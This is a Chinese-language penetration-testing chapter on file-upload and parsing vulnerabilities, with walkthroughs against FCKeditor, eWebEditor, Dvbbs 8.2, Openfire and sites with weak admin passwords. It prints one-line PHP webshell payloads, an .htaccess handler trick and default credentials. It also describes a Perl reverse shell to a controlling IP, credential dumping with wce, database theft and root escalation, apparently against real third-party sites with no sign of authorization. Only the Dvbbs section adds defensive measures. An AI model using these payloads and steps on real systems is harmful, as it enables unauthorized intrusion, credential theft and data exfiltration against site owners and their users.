Web服務(wù)器滲透實(shí)戰(zhàn)：常見(jiàn)文件上傳漏洞及利用

常見(jiàn)文件上傳漏洞及利用第一節(jié)文件上傳及解析漏洞第二節(jié)利用FCKeditor漏洞滲透某Linux服務(wù)器第三節(jié)eWebEditor漏洞滲透某網(wǎng)站第四節(jié)口令及上傳文件獲取某網(wǎng)站服務(wù)器權(quán)限第五節(jié)Dvbbs8.2插件上傳漏洞利用第六節(jié)Openfire后臺(tái)插件上傳獲取?Webshell第七節(jié)利用CFM上傳漏洞滲透某服務(wù)器第八節(jié)通過(guò)修改IWMS后臺(tái)系統(tǒng)設(shè)置獲取Webshell第九節(jié)使用BurpSuite抓包上傳Webshell第十節(jié)密碼繞過(guò)獲取某站點(diǎn)Webshell

第一節(jié)文件上傳及解析漏洞

6.1.1文件上傳的危害在Web滲透過(guò)程中，文件上傳漏洞的危害是眾所周知的，通過(guò)文件上傳可以上傳Webshell，進(jìn)而可以控制服務(wù)器。6.1.2文件解析漏洞介紹文件解析漏洞主要是一些特殊文件被IIS、Apache、Nginx等服務(wù)在某種情況下解釋成腳本文件格式并得以執(zhí)行而產(chǎn)生的漏洞。6.1.3IIS5.x/6.0解析漏洞IIS6.0解析漏洞主要有以下三種：1．目錄解析漏洞/xx.asp/xx.jpg在網(wǎng)站下創(chuàng)建文件夾名字為.asp、.asa的文件夾，其目錄內(nèi)的任何擴(kuò)展名的文件都會(huì)被IIS當(dāng)做asp文件來(lái)解析并執(zhí)行。因此攻擊者可以通過(guò)該漏洞直接上傳圖片木馬，并且不需要改后綴名。2．文件解析xx.asp;.jpg在IIS6.0下，分號(hào)后面的擴(kuò)展名不被解析，所以xx.asp;.jpg被解析為asp腳本得以執(zhí)行。3．文件類(lèi)型解析asa/cer/cdxIIS6.0默認(rèn)的可執(zhí)行文件除了asp文件還包含asa、cer、cdx這三種文件。6.1.4Apache解析漏洞Apache對(duì)文件的解析主要是從右到左開(kāi)始判斷并進(jìn)行解析的，如果判斷該文件為不能解析的類(lèi)型，則繼續(xù)向左進(jìn)行解析，如xx.php.wer.xxxxx將被解析為PHP類(lèi)型的文件。6.1.5IIS7.0/Nginx<8.03畸形解析漏洞在默認(rèn)Fastcgi開(kāi)啟狀況下上傳名字為xx.jpg，內(nèi)容如下：<?PHPfputs(fopen('shell.php','w'),'<?phpeval($_POST[cmd])?>');?>然后訪問(wèn)xx.jpg/.php，在這個(gè)目錄下就會(huì)生成一句話(huà)木馬shell.php。6.1.6Nginx<8.03空字節(jié)代碼執(zhí)行漏洞Nginx的0.5.,0.6.,0.7≤0.7.65版本和0.8≤0.8.37版本在使用PHP-Fastcgi執(zhí)行php的時(shí)候，URL里面在遇到%00空字節(jié)時(shí)與Fastcgi處理不一致，可以在圖片中嵌入PHP代碼然后通過(guò)訪問(wèn)xxx.jpg%00.php來(lái)執(zhí)行其中的代碼。另一種Nginx文件漏洞是從左到右進(jìn)行解析的，既可繞過(guò)對(duì)后綴名的限制，又可上傳木馬文件，因此可以上傳xxx.jpg.php(可能是運(yùn)氣的原因，也可能是代碼本身存在的問(wèn)題，但在其他都不能成功的條件下可以試試)。內(nèi)容如下：Content-Disposition:form-data;name="userfiles";filename="XXX.jpg.php"6.1.7htaccess文件解析如果在Apache中.htaccess可被執(zhí)行并上傳，那么可以嘗試在.htaccess中寫(xiě)入：<FilesMatch"shell.jpg">SetHandlerapplication/x-httpd-php</FilesMatch>然后再上傳包含一句話(huà)木馬代碼的shell.jpg的文件，這樣shell.jpg就可被解析為PHP文件了。6.1.8操作系統(tǒng)特性解析由于Windows系統(tǒng)會(huì)將文件后綴中的空格和點(diǎn)進(jìn)行過(guò)濾，如果遇到黑名單校驗(yàn)，如不允許上傳PHP文件，而系統(tǒng)又是Windows系統(tǒng)，那么可以上傳xx.php或xx.php.，通過(guò)這種方式就可以繞過(guò)黑名單校驗(yàn)進(jìn)行文件上傳。6.1.9前端上傳限制有的網(wǎng)站由于對(duì)文件上傳只做前端的校驗(yàn)，導(dǎo)致攻擊者可以輕易繞過(guò)校驗(yàn)，因?yàn)榍岸说囊磺邢拗贫际遣话踩?。圖6-1所示是一個(gè)對(duì)前端進(jìn)行校驗(yàn)的一個(gè)上傳測(cè)試點(diǎn)。這里通過(guò)開(kāi)啟BurpSuite進(jìn)行抓包，但是一點(diǎn)擊上傳就會(huì)提示無(wú)法上傳，而B(niǎo)urpSuite未抓到任何數(shù)據(jù)包，說(shuō)明這是一個(gè)前端校驗(yàn)的上傳，在這里通過(guò)禁用js來(lái)直接上傳PHP的Webshell，也可以先將PHP的Webshell進(jìn)行后綴名更改，如更改為jpg，然后上傳，通過(guò)BurpSuite抓包后發(fā)往repeater中進(jìn)行測(cè)試，如圖6-2所示。此時(shí)再將上傳的文件更改為原本的后綴名php，即可成功上傳，如圖6-3所示。6.1.10文件頭欺騙漏洞在一句話(huà)木馬前面加入GIF89a，然后將木馬保存為圖片格式，可以欺騙簡(jiǎn)單的WAF。6.1.11從左到右檢測(cè)在上傳文件的時(shí)候，也遇到過(guò)服務(wù)器是從左到右進(jìn)行解析的漏洞，也就是說(shuō)服務(wù)器只檢查文件名的第一個(gè)后綴，如果滿(mǎn)足驗(yàn)證要求即可成功上傳。但是眾所周知，只有最后一層的后綴才是有效的，如1.jpg.php，那么真正的后綴應(yīng)該是php，根據(jù)這個(gè)漏洞可繞過(guò)相關(guān)驗(yàn)證上傳Webshell。6.1.12filepath漏洞filepath漏洞一般用來(lái)突破服務(wù)器自動(dòng)命名規(guī)則，有以下兩種利用方式：(1)改變文件上傳后路徑(filepath)，可以結(jié)合目錄解析漏洞，路徑?/x.asp/。(2)直接改變文件名稱(chēng)(都是在filepath下進(jìn)行修改)，路徑?/x.asp;。第一種方式使用較多，圖6-4所示是一個(gè)上傳測(cè)試頁(yè)面。使用BurpSuite進(jìn)行抓包并發(fā)往Repeater，此時(shí)上傳是不成功的，而請(qǐng)求的包頭文件里面顯示了上傳后的目錄，可在此目錄下新增一個(gè)eth10.php的目錄，然后將filename改為圖片格式，如jpg，但是如果直接這樣上傳還是不成功，可以在新建的目錄后面使用00截?cái)鄟?lái)進(jìn)行上傳，如圖6-6所示。用第二種方式可以在原目錄下新建一個(gè)eth10.php文件，然后直接使用00截?cái)?，這樣依舊可以上傳php文件，因?yàn)樯蟼魇鞘褂胒ilepath以及filename來(lái)控制的，將這個(gè)文件加入filename白名單后就可以用filepath進(jìn)行上傳。上傳方法和第一種一樣，唯一的區(qū)別是在00截?cái)嗲安患幼詈笠粋€(gè)斜杠(?/?)。6.1.1300截?cái)?0截?cái)嘤幸韵聝煞N利用方式：(1)更改filename，如xx.php.jpg，在BurpSuite中將空格對(duì)應(yīng)的hex20改為00。(2)更改filename，如xx.php%00.jpg，在BurpSuite中將?%00進(jìn)行右鍵轉(zhuǎn)換?-url-urldecoder。6.1.14filetype漏洞filetype漏洞主要是針對(duì)content-type字段，主要有兩種利用方式：(1)先上傳一個(gè)圖片，然后將content-type:images/jpeg改為content-type:text/asp，然后對(duì)filename進(jìn)行00截?cái)?，將圖片內(nèi)容替換為一句話(huà)木馬。(2)直接使用BurpSuite抓包，得到Post上傳數(shù)據(jù)后，將Content-Type:text/plain改成

Content-Type:image/gif。6.1.15iconv函數(shù)限制上傳如果某天發(fā)現(xiàn)無(wú)論上傳什么文件，上傳后的文件都會(huì)自動(dòng)添加一個(gè)?.jpg后綴，那么可以懷疑是否是使用iconv這個(gè)函數(shù)進(jìn)行了上傳的限制。此時(shí)可以使用類(lèi)似00截?cái)嗟姆椒?，但這時(shí)使用的不是00截?cái)?，而?0-EF截?cái)?，也就是說(shuō)可以修改HEX為80到EF中的值來(lái)進(jìn)行截?cái)?，如上傳一個(gè)xx.php，然后截?cái)嘧グ鼘⒑竺娴目崭駥?duì)應(yīng)的十六進(jìn)制改為80到EF中的任意一個(gè)。6.1.16雙文件上傳在文件上傳的地方，右鍵點(diǎn)擊審查元素，首先修改action為完整路徑，然后復(fù)制粘貼上傳瀏覽文件(<input)，這樣就會(huì)出現(xiàn)兩個(gè)上傳框，第一個(gè)上傳正常文件，第二個(gè)選擇一句話(huà)木馬，然后提交。6.1.17表單提交按鈕有時(shí)掃描上傳路徑會(huì)發(fā)現(xiàn)只有一個(gè)瀏覽文件頁(yè)面，卻沒(méi)有提交按鈕，此時(shí)就需要寫(xiě)入提交按鈕。寫(xiě)入表單：使用快捷鍵F12審查元素，在選擇文件表單下面添加提交按鈕代碼，代碼如下：<inputtype="submit"value="提交"name="xx">

第二節(jié)利用FCKeditor漏洞滲透某Linux服務(wù)器6.2.1對(duì)已有Webshell進(jìn)行分析和研究1.搜索Webshell關(guān)鍵字Jsp的Webshell主要有JShell、JFold和JspFilebrowser三種，除此之外還有單獨(dú)所謂的“CMD”型的JSP后門(mén)，它的主要功能是執(zhí)行類(lèi)似CMD的命令。我們利用Google搜索“阿呆JSPWebshell”時(shí)出來(lái)一個(gè)網(wǎng)頁(yè)，如圖6-7所示，根據(jù)經(jīng)驗(yàn)我們可以知道第一條搜索記錄就是一個(gè)Webshell地址。2.驗(yàn)證Webshell直接打開(kāi)第一條搜索記錄，獲取真實(shí)的網(wǎng)站地址：/?UserFiles/?Image/IMG20090817235411840.jsp”打開(kāi)該地址后能夠正常運(yùn)行，如圖6-8所示，可以嘗試輸入一些常見(jiàn)的通用密碼進(jìn)行登錄，但未能成功，說(shuō)明該Webshell使用的是自己的密碼。3.分析Webshell打開(kāi)一個(gè)Webshell后我們的第一感覺(jué)是該網(wǎng)站肯定存在漏洞，入侵者有可能修復(fù)過(guò)也可能未修復(fù)漏洞，從地址來(lái)看該網(wǎng)站使用的很像是FCKeditor，我們可以直接在網(wǎng)站地址后加上“FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=?connectors/jsp/connector”并跳轉(zhuǎn)前往，如圖6-9所示，直接打開(kāi)了熟悉的FCKeditor上傳頁(yè)面。4.上傳Webshell在FCKeditor中單擊瀏覽按鈕直接選擇一個(gè)Jsp的Webshell文件，然后單擊“Upload”上傳，如圖6-11所示，上傳成功。6.2.2測(cè)試上傳的Webshell由于FCKeditor的典型目錄結(jié)構(gòu)為“UserFiles/Image/”，因此上傳的Webshell地址可以使用“UserFiles/Image(File或Flash)/+文件名稱(chēng)”，在本例中是上傳到Flash文件目錄，因此實(shí)際地址為“/UserFiles/Flash/Browser.jsp”，如圖6-12所示，Webshell能夠正常運(yùn)行，此時(shí)就可以利用Webshell進(jìn)行下載、上傳、刪除、復(fù)制以及執(zhí)行命令等操作。6.2.3對(duì)Webshell所在服務(wù)器進(jìn)行信息收集與分析1．獲取服務(wù)器類(lèi)型在獲取Webshell后可以通過(guò)它來(lái)執(zhí)行命令，查看服務(wù)器的配置情況，如圖6-13所示，通過(guò)瀏覽文件目錄可以知道該服務(wù)器為L(zhǎng)inux服務(wù)器。2．下載網(wǎng)站源代碼與數(shù)據(jù)通過(guò)滲透能夠快速提高個(gè)人攻防能力，在滲透成功后下載網(wǎng)站源代碼與數(shù)據(jù)到本地進(jìn)行分析，取長(zhǎng)補(bǔ)短學(xué)習(xí)他人長(zhǎng)處，快速積累經(jīng)驗(yàn)。在本例中通過(guò)查看該服務(wù)器下的“var/mysqlbak”目錄，獲取了該網(wǎng)站的數(shù)據(jù)庫(kù)MySQL備份文件，如圖6-14所示，通過(guò)Webshell可以下載單獨(dú)的文件，也可以打包下載整個(gè)網(wǎng)站的文件。3．獲取他人的Webshell密碼他人的Webshell是本次滲透的目標(biāo)，通過(guò)Webshell的地址去反過(guò)來(lái)查看文件的實(shí)際地址，使用cat命令查看其登錄密碼：cathome/webhome//?WEB-INF/?webapps/?ROOT/UserFiles/Image/?IMG200908jsp如圖6-15所示，獲取其密碼為“191903***”。6.2.4服務(wù)器提權(quán)1．查看Linux版本在Webshell中直接執(zhí)行“uname-a”命令來(lái)查看Linux版本，結(jié)果顯示為“Linux.tw2.6.9-11.ELsmp#1SMPFriMay2018:26:27EDT2005i686i686i386GNU/Linux”，如圖6-16所示。2．查看操作系統(tǒng)發(fā)行版本“cat/etc/issue”命令主要用來(lái)顯示操作系統(tǒng)發(fā)行版本等信息，用戶(hù)可以定制issue，也就是說(shuō)可以手動(dòng)修改，如果未修改則默認(rèn)顯示各個(gè)操作系統(tǒng)發(fā)行版本的信息，如圖6-17所示。3．反彈回shell將反彈腳本c.pl上傳到路徑“/var/tmp”，然后在控守計(jì)算機(jī)上執(zhí)行“nc-vv-l-p53”，然后再在該Webshell中執(zhí)行“perl/var/tmp/c.pl202.102.xxx.xxx53”，如圖6-18所示。4．嘗試提權(quán)通過(guò)Webshell上傳最新的sendpage3漏洞利用程序，上傳成功后，在反彈的shell中查看上傳的程序，然后直接執(zhí)行“./run”命令，如圖6-20所示，直接提權(quán)為Root用戶(hù)權(quán)限。6.2.5FCKeditor編輯器漏洞總結(jié)本案例通過(guò)FCKeditor漏洞成功獲取Webshell后，通過(guò)查看Linux版本和操作系統(tǒng)的發(fā)行版本等信息，上傳相應(yīng)的漏洞利用程序，通過(guò)在反彈的終端執(zhí)行exploit而獲得系統(tǒng)的最高權(quán)限。1.?FCKeditor重要信息收集(1)?FCKeditor編輯器頁(yè)：FCKeditor/_samples/default.html(2)查看編輯器版本：FCKeditor/_whatsnew.html(3)查看文件上傳路徑：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/2.?FCKeditor被動(dòng)限制策略所導(dǎo)致的過(guò)濾不嚴(yán)問(wèn)題3.利用Windows2003路徑解析漏洞上傳網(wǎng)頁(yè)木馬4．FCKeditorPHP上傳任意文件漏洞5．Type自定義參數(shù)變量任意上傳文件漏洞6.?aspx版FCKeditor新聞組件遍歷目錄漏洞7.?FCKeditor中Webshell其他的上傳方式8.?FCKeditor文件上傳“.”變“_”的繞過(guò)方法9.“.htaccess”文件圖片上傳

第三節(jié)eWebEditor漏洞滲透某網(wǎng)站6.3.1基本信息收集及獲取后臺(tái)管理權(quán)限1.?eWebEditor重要信息(1)默認(rèn)后臺(tái)地址：/ewebeditor/admin_login.asp。(2)默認(rèn)數(shù)據(jù)庫(kù)路徑：[PATH]/db/ewebeditor.mdb、[PATH]/db/db.mdb、[PATH]?/?db?/?%23ewebeditor.mdb。(3)使用默認(rèn)賬戶(hù)和密碼admin/admin888或admin/admin進(jìn)入后臺(tái)，也可嘗試admin/123456，如果使用簡(jiǎn)單的賬戶(hù)和密碼不行，可以嘗試?yán)肂urpSuite等工具進(jìn)行密碼暴力破解進(jìn)入后臺(tái)。(4)后臺(tái)樣式管理獲取Webshell。(5)當(dāng)數(shù)據(jù)庫(kù)被管理員修改為asp或asa格式的時(shí)候，可以插入一句話(huà)木馬服務(wù)端進(jìn)入數(shù)據(jù)庫(kù)，然后利用一句話(huà)木馬客戶(hù)端連接拿下Webshell。2.獲取后臺(tái)登錄地址獲取后臺(tái)登錄地址通常有三種方法。第一種是通過(guò)SQL注入等掃描工具進(jìn)行掃描獲??；第二種是根據(jù)個(gè)人經(jīng)驗(yàn)進(jìn)行猜測(cè)；第三種是特殊類(lèi)型的后臺(tái)地址，這種后臺(tái)地址沒(méi)有任何規(guī)律可循，怎么復(fù)雜就怎么構(gòu)造，對(duì)這種網(wǎng)站可以通過(guò)旁注或者在同網(wǎng)段服務(wù)器，也可以通過(guò)系統(tǒng)設(shè)計(jì)的邏輯漏洞進(jìn)行嗅探。在本例中通過(guò)測(cè)試獲取后臺(tái)地址為“http://034.748239.com/post/admin”，如圖6-21所示，成功獲取后臺(tái)登錄地址。3.進(jìn)入后臺(tái)使用賬號(hào)“admin”，密碼“admin888”進(jìn)入后臺(tái)，如圖6-22所示。6.3.2漏洞分析及利用1.分析網(wǎng)站源代碼(1)通過(guò)查看網(wǎng)站使用的模板以及樣式表等特征信息，判斷該網(wǎng)站使用了SouthidcEditor，并通過(guò)掃描獲取了其詳細(xì)的編輯器地址。(2)下載其默認(rèn)的mdb數(shù)據(jù)庫(kù)，并對(duì)其密碼進(jìn)行破解，獲取其賬號(hào)對(duì)應(yīng)的密碼，使用該密碼進(jìn)行登錄，成功進(jìn)入后臺(tái)，如圖6-23所示。2.對(duì)樣式表進(jìn)行修改單擊“樣式管理”，在其中新建一個(gè)樣式名稱(chēng)“112”，并在允許上傳文件類(lèi)型及文件大小設(shè)置中添加“|asp|cer|asasp”類(lèi)型，如圖6-24所示。3.使用上傳漏洞進(jìn)行上傳將以下代碼保存為htm文件并打開(kāi)，如圖6-25所示，上傳一個(gè)asp的木馬文件。4.獲取上傳文件具體地址在管理菜單中單擊“上傳文件管理”，選擇樣式目錄“112”，如圖6-26所示6.3.3獲取Webshell權(quán)限及信息擴(kuò)展收集1.獲取Webshell使用中國(guó)菜刀管理工具連接該Webshell地址，成功獲取Webshell，如圖6-27所示。2.信息擴(kuò)展(1)獲取QQ賬號(hào)信息。(2)獲取Ftp賬號(hào)信息。(3)詐騙關(guān)鍵字。通過(guò)對(duì)網(wǎng)站代碼進(jìn)行分析，發(fā)現(xiàn)詐騙網(wǎng)站會(huì)在首頁(yè)添加諸如“網(wǎng)上安全管理下載1”、“網(wǎng)上安全管理下載2”、“網(wǎng)上安全管理下載3”、“網(wǎng)上偵查系統(tǒng)”和“遠(yuǎn)程安全協(xié)助”等關(guān)鍵字，誘使用戶(hù)下載“檢察院安全管理軟件.exe”、“檢察院安全控件.exe”、“簡(jiǎn)易IIS服務(wù)器.exe”、“網(wǎng)絡(luò)安全控件.zip”等遠(yuǎn)程控制軟件，或者誘導(dǎo)用戶(hù)訪問(wèn)指定的網(wǎng)站地址，對(duì)用戶(hù)進(jìn)行銀行賬號(hào)及密碼的盜取，從而進(jìn)行詐騙活動(dòng)。(4)使用工具軟件對(duì)正規(guī)網(wǎng)站進(jìn)行鏡像仿冒。6.3.4滲透及eWebEditor編輯器漏洞總結(jié)1．SouthidcEditor網(wǎng)站編輯器漏洞2．SouthidcEditor數(shù)據(jù)庫(kù)下載地址3．eWebEditor遍歷路徑漏洞4．利用eWebEditorsession欺騙漏洞進(jìn)入后臺(tái)5．eWebEditor2.7.0注入漏洞6．eWebEditorv6.0.0上傳漏洞7．eWebEditorPHP/ASP后臺(tái)通殺漏洞8．eWebEditorNetupload.aspx上傳漏洞

第四節(jié)口令及上傳文件獲取某網(wǎng)站

服務(wù)器權(quán)限6.4.1尋找后臺(tái)地址思路在滲透過(guò)程中，通過(guò)掃描有可能未能發(fā)現(xiàn)前臺(tái)存在SQL注入等漏洞，或者因?yàn)槁┒磼呙柢浖旧淼南拗?，未能掃描到網(wǎng)站所有的文件或找到的可利用的漏洞有限，這時(shí)就需要獲取后臺(tái)地址，通過(guò)后臺(tái)來(lái)尋求突破，后臺(tái)地址尋找思路如下：(1)默認(rèn)后臺(tái)地址。一般是網(wǎng)站名稱(chēng)?+?后臺(tái)名稱(chēng)。(2)通過(guò)掃描器掃描獲取后臺(tái)地址。(3)網(wǎng)站直接提供后臺(tái)地址。(4)專(zhuān)用系統(tǒng)的一些后臺(tái)地址。(5)通過(guò)Google、百度等搜索引擎來(lái)搜索登錄、系統(tǒng)管理等關(guān)鍵字來(lái)尋找后臺(tái)地址。(6)某些PHP程序，其后臺(tái)地址為index.php/Admin/Login/index.html。(7)從根目錄admin.php/admin.aspx/admin.asp/admin.jsp直接進(jìn)后臺(tái)。(8)其他情況。6.4.2后臺(tái)口令獲取后臺(tái)地址對(duì)于某些官方類(lèi)的站點(diǎn)，先可以嘗試admin/admin、admin/admin888、admin/123456等弱口令登錄后臺(tái)；如果在登錄時(shí)沒(méi)有提示輸入驗(yàn)證碼，則可以通過(guò)BurpSuite進(jìn)行后臺(tái)密碼暴力破解。本次測(cè)試首先找到后臺(tái)地址，如圖6-30所示，然后使用弱口令admin/123456成功登錄系統(tǒng)。6.4.3獲取Webshell1.尋找上傳地址成功登錄后臺(tái)后，尋找上傳地址思路如下：(1)去查看文章發(fā)表及公告發(fā)布的地方，這些地方一定會(huì)存在編輯器。(2)去查看附件管理，比如Dedecms附件管理可以直接上傳文件和編輯文件。(3)去查看附件上傳的地方，有的網(wǎng)站有單獨(dú)附件上傳地點(diǎn)。(4)去查看網(wǎng)站輪換圖片地址，有的網(wǎng)站有單獨(dú)圖片處理地址，可以在此上傳文件。(5)去查看網(wǎng)站功能設(shè)置處，可以直接修改上傳文件的類(lèi)型，也可以添加網(wǎng)站支持的類(lèi)型。在本例中有一個(gè)圖片新聞，如圖6-31所示，其中圖片跟編輯器是分開(kāi)的，這種情況極有可能可以直接上傳腳本文件從而獲取Webshell。也就是說(shuō)這個(gè)地方可以進(jìn)行構(gòu)造和修改。2.直接上傳文件測(cè)試單擊選擇文件，在其中直接選擇一個(gè)PHP的Webshell，如圖6-32所示，并進(jìn)行上傳，順利上傳后，右鍵單擊獲取圖片的地址，或者查看源代碼來(lái)獲取Webshell的真實(shí)地址，如圖6-33所示，成功獲取Webshell。6.4.4服務(wù)器提權(quán)1.獲取服務(wù)器密碼通過(guò)Webshell的命令執(zhí)行功能查看當(dāng)前用戶(hù)的權(quán)限，如圖6-34所示，執(zhí)行whoami命令后顯示為system權(quán)限，說(shuō)明PHP給的權(quán)限為系統(tǒng)權(quán)限，不用提權(quán)，可以通過(guò)上傳wce等程序來(lái)獲取當(dāng)前登錄用戶(hù)的明文密碼或者通過(guò)網(wǎng)站在線查詢(xún)系統(tǒng)密碼。上傳wce32和wce64程序到C盤(pán)根目錄，通過(guò)dirwce*?命令查看上傳的文件是否存在及是否被系統(tǒng)殺毒軟件查殺，然后執(zhí)行wce32.rar-w命令，注意這里不是wce32.exe，可執(zhí)行文件后綴雖然不是exe，但仍然當(dāng)作exe來(lái)執(zhí)行，順利獲取當(dāng)前管理員密碼“7788919aA”。2.成功登錄服務(wù)器使用遠(yuǎn)程終端直接登錄該服務(wù)器，如圖6-36所示，成功登錄，通過(guò)查看IP地址，發(fā)現(xiàn)該服務(wù)器配置有內(nèi)網(wǎng)IP。6.4.5總結(jié)與思考(1)通過(guò)尋找文件上傳模塊，在該模塊中可以先測(cè)試能否直接上傳PHP的Webshell，在某些情況下，程序員未對(duì)上傳文件進(jìn)行檢測(cè)，因此可以直接獲取Webshell，這是文件上傳漏洞中的一個(gè)特例。(2)后續(xù)在該網(wǎng)站又發(fā)現(xiàn)了目錄信息泄露以及數(shù)據(jù)泄露，在存在漏洞的網(wǎng)站中發(fā)現(xiàn)漏洞后，漏洞就會(huì)越找越多。

第五節(jié)Dvbbs8.2插件上傳漏洞利用6.5.1Dvbbs8.2插件上傳漏洞利用研究1.使用Google搜索2.注冊(cè)用戶(hù)隨機(jī)選取一個(gè)論壇，打開(kāi)論壇后直奔注冊(cè)頁(yè)面，如圖6-38所示，按照要求進(jìn)行注冊(cè)。3.修改樣式使用注冊(cè)好的用戶(hù)登錄論壇成功后，單擊論壇工具欄上的“我的主頁(yè)”，進(jìn)入個(gè)人主頁(yè)配置，然后點(diǎn)擊“個(gè)人空間管理”標(biāo)簽，在基本設(shè)置中給現(xiàn)有的“空間標(biāo)題”和“簡(jiǎn)介說(shuō)明”隨便起一個(gè)名字，如圖6-39所示，然后點(diǎn)擊“保存設(shè)置”按扭，接下來(lái)，單擊“自定義風(fēng)格”按鈕，在“樣式風(fēng)格CSS修改”里任意輸入幾個(gè)字符，如圖6-40所示，然后單擊“保存設(shè)置”完成修改。4.無(wú)上傳界面在“個(gè)人空間管理”中單擊“自定義風(fēng)格”，然后再單擊“文件管理”按扭，接著就會(huì)彈出一個(gè)風(fēng)格模板的文件管理新窗口了，如圖6-41所示，然而在本次滲透中雖然出現(xiàn)了文件管理頁(yè)面，但并未出現(xiàn)上傳界面，說(shuō)明管理員或者前期滲透人員刪除了上傳功能模塊，只能放棄，重新再選擇一個(gè)目標(biāo)進(jìn)行滲透。5.成功上傳文件重新找了十多個(gè)論壇進(jìn)行測(cè)試，終于測(cè)試成功了一個(gè)，如圖6-42所示，選擇一個(gè)一句話(huà)木馬文件，將文件名稱(chēng)命名為“1.asp;1.jpg”，然后直接上傳即可，上傳成功后頁(yè)面會(huì)自動(dòng)刷新，如果無(wú)殺毒軟件或者其他防范措施，一般都會(huì)出現(xiàn)剛才上傳的一句話(huà)木馬，且作為圖片格式的木馬不會(huì)顯示出來(lái)。6.5.2獲取Webshell1.使用一句話(huà)客戶(hù)端進(jìn)行連接使用lake2EvalClient進(jìn)行連接，在“TheURL”中輸入圖片的詳細(xì)地址，在“Password”中輸入一句話(huà)木馬的連接密碼，在本例中密碼是“cmd”，然后在“Function”(功能)中選擇一個(gè)模塊，如圖6-43所示，單擊“Send”，即可查看具體執(zhí)行效果，顯示磁盤(pán)情況如圖6-44所示。2.獲取網(wǎng)站的物理路徑在功能模塊中選擇“ServerVariable”獲取服務(wù)器和客戶(hù)的一些基本信息，如圖6-45所示，獲取一句話(huà)木馬的具體路徑為“F:\www\\bbs\skins\myspace\userskins\skin_14\”；接著通過(guò)上傳功能上傳一個(gè)大馬到服務(wù)器，輸入密碼后如圖6-46所示。3.提權(quán)失敗使用Serv-u以及FTP提權(quán)均告失敗，后面對(duì)服務(wù)器端口進(jìn)行掃描，發(fā)現(xiàn)服務(wù)器關(guān)閉了21端口和43958端口，如圖6-47所示。4.查找并下載數(shù)據(jù)庫(kù)在站點(diǎn)根目錄中查找數(shù)據(jù)庫(kù)配置腳本文件，如圖6-48所示，本例中數(shù)據(jù)庫(kù)配置連接文件為conn.asp，直接打開(kāi)并獲取數(shù)據(jù)庫(kù)的相對(duì)路徑“\database\unfgsa#szht.mdb”。由于在該數(shù)據(jù)庫(kù)名稱(chēng)中使用了“#”號(hào)，因此使用瀏覽器下載的文件僅為1k，也就是說(shuō)下載失敗，對(duì)于這類(lèi)文件有兩個(gè)辦法進(jìn)行下載：(1)直接使用Webshell中的復(fù)制功能，將文件重新命名為可以下載的文件。(2)使用“%23”代替“#”進(jìn)行下載，如圖6-49所示，更換后可以將數(shù)據(jù)庫(kù)文件下載到本地。6.5.3Dvbbs8.2滲透思路與防范措施1.滲透思路(1)下載Dvbbs8.2版本的database和boke的默認(rèn)地址：data/Dvbbs8.mdb和boke/data/Dvboke.mdb。下載后通過(guò)查詢(xún)破解16位的md5密碼進(jìn)入后臺(tái)。(2)利用IIS圖片上傳漏洞，本節(jié)中的插件上傳漏洞本質(zhì)上屬于IIS文件解析漏洞。(3)修改文件上傳類(lèi)型，使其支持服務(wù)器平臺(tái)的腳本并上傳。如果平臺(tái)支持PHP/JSP/A，那么可以上傳平臺(tái)支持的木馬，然后獲取Webshell。2.防范措施(1)?Dvbbs安裝完畢后一定要修改默認(rèn)數(shù)據(jù)庫(kù)名稱(chēng)，同時(shí)去掉無(wú)用的txt文件和“PoweredByDvbbs8.2”標(biāo)示。(2)后臺(tái)密碼設(shè)置強(qiáng)度高一些。即使下載了數(shù)據(jù)庫(kù)，攻擊者如果沒(méi)有破解密碼便無(wú)能為力。(3)謹(jǐn)慎使用插件和功能強(qiáng)大的模塊，使用時(shí)盡量使用最小權(quán)限。(4)把上傳圖片的目錄的腳本執(zhí)行權(quán)限去掉，或者暫時(shí)將文件管理的上傳模塊去掉。(5)規(guī)范上傳腳本的代碼，校驗(yàn)上傳圖片和文件的代碼段，或者在論壇后臺(tái)把上傳功能關(guān)閉。

第六節(jié)Openfire后臺(tái)插件上傳獲取

?Webshell6.6.1選定攻擊目標(biāo)如果在實(shí)際網(wǎng)絡(luò)掃描過(guò)程中發(fā)現(xiàn)存在Openfire便可以跳過(guò)下面的步驟，在進(jìn)行滲透學(xué)習(xí)時(shí)可以利用fofa.so和Shadon等搜索引擎來(lái)排除或篩選目標(biāo)IP等信息，以獲取符合攻擊特征的目標(biāo)IP或站點(diǎn)。1.目標(biāo)獲取2.暴力破解或者使用弱口令登錄系統(tǒng)一般的弱口令有admin/admin、admin/admin888、admin/123456，如果在嘗試登錄時(shí)這些弱口令無(wú)法登錄請(qǐng)直接使用BurpSuite進(jìn)行暴力破解進(jìn)行登錄。對(duì)于能夠正常訪問(wèn)的網(wǎng)站，可以嘗試登錄，如圖6-51所示，Openfire可能使用的不是默認(rèn)端口。6.6.2獲取后臺(tái)權(quán)限輸入正確密碼后進(jìn)入后臺(tái)，如圖6-52所示，可以查看服務(wù)器設(shè)置、用戶(hù)/用戶(hù)群、會(huì)話(huà)、分組聊天以及插件等信息。6.6.3上傳插件并獲取Webshell1.查看并上傳插件單擊插件，在其中可以看到所有的插件列表，在上傳插件欄中單擊上傳插件，選擇專(zhuān)門(mén)生成的帶Webshell的Openfire插件，如圖6-53所示。在本次測(cè)試中，從互聯(lián)網(wǎng)收集了兩個(gè)漏洞插件利用代碼，如圖6-54所示，均成功上傳。2.獲取Webshell(1)?helloworld插件獲取Webshell。單擊服務(wù)器—服務(wù)器設(shè)置，如果上傳helloworld插件并運(yùn)行成功，在配置文件下面會(huì)生成一個(gè)用戶(hù)接口設(shè)置鏈接，單擊該鏈接即可獲取Webshell，如圖6-56所示。(2)?broadcast插件獲取Webshell。如圖6-57和圖6-58所示，獲取broadcast的Webshell并查看當(dāng)前用戶(hù)權(quán)限為root。6.6.4免root密碼登錄服務(wù)器雖然通過(guò)Webshell可以獲取/etc/shadow文件，但該root及其他用戶(hù)的密碼不是那么容易被破解的。我們可以在服務(wù)器上面用SSH來(lái)嘗試能否利用公私鑰來(lái)解決訪問(wèn)問(wèn)題。1.在服務(wù)器上監(jiān)聽(tīng)端口2.反彈shell到控守服務(wù)器3.實(shí)際操作流程(1)遠(yuǎn)程服務(wù)器生成公私鑰。(2)本地Linux上生成公私鑰。(3)將本地公鑰上傳到遠(yuǎn)程服務(wù)器上并生成authorized_keys。(4)刪除多余文件。(5)登錄服務(wù)器。使用命令“sshroot@